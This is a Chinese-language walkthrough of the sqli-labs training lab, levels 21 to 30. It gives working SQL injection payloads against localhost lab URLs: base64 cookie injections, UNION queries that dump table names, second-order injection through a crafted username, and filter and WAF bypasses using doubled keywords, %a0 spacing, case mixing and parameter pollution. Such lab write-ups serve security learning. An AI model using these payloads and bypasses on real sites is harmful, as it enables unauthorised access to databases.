Sqli-labs Advanced Injections(21-30)

Less-21 Cookie Injection- Error Based- complex – string

利用username=admin&password=admin登录成功

返回一个cookie,base64解码得admin,说明返回的cookie是登录的用户名经过base64编码所得,利用用户名,经测试为语句为(‘ ‘)闭合,构造payload如下:

admin') order by 1 #

base64编码为

YWRtaW4nKSBvcmRlciBieSAxICM=

给页面传cookie参数吗,这里通过hackbar(火狐插件)操作

查询到4时报错,说明列数为3,联合查询:

admin') and 1=2 union select 1,2,3#
base64:
YWRtaW4nKSBhbmQgMT0yIHVuaW9uIHNlbGVjdCAxLDIsMyM=

得注入点:1,2,3

爆库名和表(后面less皆注入到此步骤)

admin') and 1=2 union select group_concat(table_name),database(),version() from information_schema.tables where table_schema=database()#
base64:
YWRtaW4nKSBhbmQgMT0yIHVuaW9uIHNlbGVjdCBncm91cF9jb25jYXQodGFibGVfbmFtZSksZGF0YWJhc2UoKSx2ZXJzaW9uKCkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT1kYXRhYmFzZSgpIw==

Less-22 Cookie Injection- Error Based- Double Quotes – string

相对于Less-21,将语句的闭合变为双引号,其他同理,修改payload如下:

admin" and 1=2 union select group_concat(table_name),database(),version() from information_schema.tables where table_schema=database()#
base64:
YWRtaW4iIGFuZCAxPTIgdW5pb24gc2VsZWN0IGdyb3VwX2NvbmNhdCh0YWJsZV9uYW1lKSxkYXRhYmFzZSgpLHZlcnNpb24oKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPWRhdGFiYXNlKCkj

爆库名和表

Less-23 Error Based- no comments

测试单引号,报错

尝试其他字符#(%23)

不难发现#被后台替换成空字符了(两个单引号之间没有空隙)
再试试– 单行注释

报错只把limit前面的单引号报出来,说明前面的单引号匹配了,猜测–被替换成空字符
查看源码,果然如此:

那只能闭合语句,构造payload:

http://localhost/sqli-labs-master/Less-23/?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database() limit 0,5),database()'

Less-24 – Second Degree Injections

一个二次注入,先审计下文件
login.php(过滤账户和密码)

login_create.php()

pass_change.php

可以发现更改密码时,sql语句用的是SESSION设置的值,那么只要用户名带有注释符便可注释掉后面的语句,无视密码限制
例如用户名为admin’ — (–后面带空格)的账户(‘在注册时会被转义成\’,但是在数据库时还是显示’)
创建特殊用户admin’ –,此处密码随便设,设了1234
进入数据库,查看创建成功

修改密码


在数据库中查看,发现admin的密码被成功修改了

Less-25 Trick with OR & AND

传参or和and,从提示处可以发现被过滤了


复写绕过


也可以通过对应的数学符号绕过(&&需经过url编码)


构造payload

http://localhost/sqli-labs-master/Less-25/?id=1' anandd 1=2 union select 1,database(),group_concat(table_name) from infoorrmation_schema.tables where table_schema=database() --%20

Less-25a Trick with OR & AND Blind

相对于25,将报错关闭
通过在id号前面加or或者and来测试是否被过滤,其余与less-25并无异处

Less-26 Trick with comments

看下源码,过滤了很多

由于多行注释被过滤,不能用来代替空格,用%a0代替
构造payload:

http://localhost/sqli-labs-master/Less-26/?id=1'%a0anandd%a01=2%a0union%a0select%a01,(select%a0group_concat(table_name)%a0from%a0infoorrmation_schema.tables%a0where%a0table_schema=database()),database()'

Less-26a Trick with comments Blind

相对于less-26,关闭报错,同理测试过滤,其他相同

确认过滤了#  
http://localhost/sqli-labs-master/Less-26a/?id=%231  
确认过滤了or  
http://localhost/sqli-labs-master/Less-26a/?id=or1  
确认过滤多行注释符  
http://localhost/sqli-labs-master/Less-26a/?id=/*1  
确认过滤了单行注释  
http://localhost/sqli-labs-master/Less-26/?id=--1 
确认过滤了斜杠  
http://localhost/sqli-labs-master/Less-26/?id=/1  
确认过滤了反斜杠  
http://localhost/sqli-labs/Less-26/?id=1\  
确认过滤了空格,通过报错判断  
http://localhost/sqli-labs/Less-26/?id=1' ' '  

Less-27 Trick with SELECT & UNION

容易知道为单引号型注入,且空格被过滤了

查看源码

不严格的过滤,大小写绕过

http://localhost/sqli-labs-master/Less-27/?id=1'%a0and%a01=2%a0uNion%a0sElect%a01,(sElect%a0group_concat(table_name)%a0from%a0information_schema.tables%a0where%a0table_schema=database()),database()'

Less-27a Trick with SELECT & UNION Blind

双引号型注入,原理相同
payload:

http://localhost/sqli-labs-master/Less-27a/?id=1"%a0and%a0(length(database())>8)%a0uNion%a0sElect%a01,(sElect%a0group_concat(table_name)%a0from%a0information_schema.tables%a0where%a0table_schema=database()),database()"

Less-28 Trick with SELECT & UNION

观察源码

union和select开启了i模式匹配,且中间用\s过滤空格,不过用%a0依旧可以绕过,此处sql语句用(”)闭合
payload:

http://localhost/sqli-labs-master/Less-28/?id=1')%a0and%a01=2%a0union%a0select%a01,(select%a0group_concat(table_name)%a0from%a0information_schema.tables%a0where%a0table_schema=database()),('database()

Less-28a Trick with SELECT & UNION Blind

同上面的盲注原理,构造payload:

http://localhost/sqli-labs-master/Less-28a/?id=1')%a0and%a0(length(database())>8)%a0union%a0select%a01,(select%a0group_concat(table_name)%a0from%a0information_schema.tables%a0where%a0table_schema=database()),('database()

Less-29 Protection with WAF

配置tomcat环境,输入单引号,报错并跳转页面

https://blog.csdn.net/nzjdsds/article/details/77758824
根据这篇文章,可以利用第二个值绕过waf
payload:

http://localhost:8080/sqli-labs-master/Less-29/?id=8&id=8' and 1=2 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database() limit 0,5),database()'

Less-30 WAF PROTECT

与less-29原理一样,只不过变成了””闭合
payload:

http://localhost:8080/sqli-labs-master/Less-30/?id=8&id=8" and 1=2 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database() limit 0,5),database()"